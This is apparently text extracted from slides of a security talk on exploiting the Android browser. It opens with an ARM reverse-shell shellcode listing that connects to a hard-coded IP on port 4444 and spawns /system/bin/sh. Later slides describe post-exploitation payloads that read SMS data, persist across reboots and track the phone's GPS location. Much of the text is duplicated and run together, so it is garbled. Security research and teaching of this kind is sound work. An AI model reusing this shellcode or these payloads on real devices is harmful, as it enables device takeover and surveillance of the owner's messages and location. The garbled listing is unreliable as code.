0:0: e3a00002 e3a00002 movmov r0, #2r0, #2 ; 0x2 4:; 0x2 4: e3a01001 e3a01001 movmov r1, #1r1, #1 ; 0x1 8:; 0x1 8: e3a02006 e3a02006 movmov r2, #6r2, #6 ; 0x6 c:; 0x6 c: e1a07401 e1a07401 lsllsl r7, r1, #8 10:r7, r1, #8 10: e2877019 e2877019 addadd r7, r7, #25r7, r7, #25 ; 0x19 14:; 0x19 14: ef000000 ef000000 svcsvc 0x00000000 fd = socket(AF_INET, SOCK_STREAM, SOL_TCP);0x00000000 fd = socket(AF_INET, SOCK_STREAM, SOL_TCP); 18: 18: e1a0a000 e1a0a000 movmovsl, r0 1c:sl, r0 1c: eb000001 eb000001 blbl 28 <shellcode+0x28> 20:28 <shellcode+0x28> 20: 5c110002 5c110002 serv_addr 4444serv_addr 4444 24: 24: e701a8c0 e701a8c0 192.168.1.231192.168.1.231 28: 28: e1a0000a e1a0000a movmov r0, sl 2c:r0, sl 2c: e1a0100e e1a0100e movmov r1, lr 30:r1, lr 30: e3a02010 e3a02010 movmov r2, #16r2, #16 ; 0x10 34:; 0x10 34:e3a07001 e3a07001 movmov r7, #1r7, #1 ; 0x1 38:; 0x1 38: e1a07407 e1a07407 lsllsl r7, r7, #8 3c:r7, r7, #8 3c: e287701b e287701b addadd r7, r7, #27r7, r7, #27 ; 0x1b 40:; 0x1b 40: ef000000 ef000000 svcsvc 0x00000000 connect(fd, serv_addr, 16);0x00000000 connect(fd, serv_addr, 16); 44: 44: e3a05002 e3a05002 movmov r5, #2r5, #2 ; 0x2 ; 0x2 r5 = 2;r5 = 2; 48: 48: e3a0703f e3a0703f movmov r7, #63r7, #63 ; 0x3f ; 0x3f do {do { 4c: 4c: e1a0000a e1a0000a
movmov r0, sl 50:r0, sl 50: e1a01005 e1a01005 movmov r1, r5 54:r1, r5 54: ef000000 ef000000 svcsvc 0x00000000 dup2(fd, r5) 0x00000000 dup2(fd, r5) 58: 58: e2455001 e2455001 subsub r5, r5, #1r5, r5, #1 ; 0x1 ; 0x1 r5--;r5--; 5c: 5c: e2550000 e2550000 subssubs r0, r5, #0r0, r5, #0 ; 0x0 60:; 0x0 60: aafffff8 aafffff8 bgebge 48 <shellcode+0x48> } 48 <shellcode+0x48> } while(r5>0)while(r5>0) 64: 64: e0455005 e0455005 subsub r5, r5, r5 68:r5, r5, r5 68: e1a0600d e1a0600d movmov r6, sp 6c:r6, sp 6c: e24dd020 e24dd020 subsub sp, sp, #32sp, sp, #32 ; 0x20 70:; 0x20 70: e28f0014 e28f0014 addadd r0, pc, #20r0, pc, #20 ; 0x14 74:; 0x14 74: e4860000 e4860000 strstr r0, [r6] 78:r0, [r6] 78: e5865004 e5865004 strstr r5, [r6, #4] 7c:r5, [r6, #4] 7c: e1a01006 e1a01006 movmov r1, r6 80:r1, r6 80: e3a02000 e3a02000 movmov r2, #0r2, #0 ; 0x0 84:; 0x0 84:
e3a0700b e3a0700b movmov r7, #11r7, #11 ; 0xb 88:; 0xb 88: ef000000 ef000000 svcsvc 0x00000000 exexve(“/system/bin/sh”, ..., 0)0x00000000 exexve(“/system/bin/sh”, ..., 0) 8c: 8c: 7379732f 7379732f 90: 90: 2f6d6574 2f6d6574 94: 94: 2f6e6962 2f6e6962 98: 98: 00006873 00006873
Exploit demoExploit demo
After accessAfter access
Straying from the sandboxStraying from the sandbox
PayloadsPayloads
Sandbox Sandbox
You can do anything the browser can doYou can do anything the browser can do
Persist across rebootsPersist across reboots
Get SMS messagesGet SMS messages
dumpsys gives alerts, which include SMS infodumpsys gives alerts, which include SMS info
ls -l /data/data/com.android.browser/databases-rw-r--r-- app_1 app_1 ls -l /data/data/com.android.browser/databases-rw-r--r-- app_1 app_1 3608 2009-01-20 01:52 webviewCache.db-journal-rw-rw---- app_1 app_1 3608 2009-01-20 01:52 webviewCache.db-journal-rw-rw---- app_1 app_1 17408 2009-01-16 05:04 webview.db-rw-rw---- app_1 app_1 12288 2009-01-20 17408 2009-01-16 05:04 webview.db-rw-rw---- app_1 app_1 12288 2009-01-20 01:52 browser.db-rw-rw---- app_1 app_1 6144 2009-01-20 01:51 01:52 browser.db-rw-rw---- app_1 app_1 6144 2009-01-20 01:51 webviewCache.dbwebviewCache.db
ls -l /data/data/com.android.browser/app_plugins/gears.so-rw------- app_1 app_1 1169164 2009-01-12 16:38 gears.sols -l /data/data/com.android.browser/app_plugins/gears.so-rw------- app_1 app_1 1169164 2009-01-12 16:38 gears.so
PayloadsPayloads
Can write standard shellcodeCan write standard shellcode
Can write shellcode that uses android APICan write shellcode that uses android API
Can write C/C++ programsCan write C/C++ programs
Probably can’t use your own Java apps...Probably can’t use your own Java apps...
Example C++ payloadExample C++ payloadModified gpstest from the android source codeModified gpstest from the android source code
Change it not to use libhardware.soChange it not to use libhardware.so
Have it call gps_get_hardware_interface from Have it call gps_get_hardware_interface from libgps.solibgps.so
Place libgps.so, librpc.so (from phone) in Place libgps.so, librpc.so (from phone) in out/target/product/generic/obj/lib/out/target/product/generic/obj/lib/
./agcc.pl -fno-short-enums -o gpstest gpstest.cpp -lgps./agcc.pl -fno-short-enums -o gpstest gpstest.cpp -lgps
./gpsteststatus: GPS_STATUS_SESSION_BEGINstatus: ./gpsteststatus: GPS_STATUS_SESSION_BEGINstatus: GPS_STATUS_ENGINE_ONSV: 15 SNR: 23.7 Elev: 53.0 Azim: 146.0 E AGot GPS_STATUS_ENGINE_ONSV: 15 SNR: 23.7 Elev: 53.0 Azim: 146.0 E AGot Fix: latitude: XX.577622 longitude: -XX.604768 altitude: 190.0...Fix: latitude: XX.577622 longitude: -XX.604768 altitude: 190.0...
ThanksThanks
Mark Daniel - debugging guruMark Daniel - debugging guru
Owen Arden - king of fuzzOwen Arden - king of fuzz
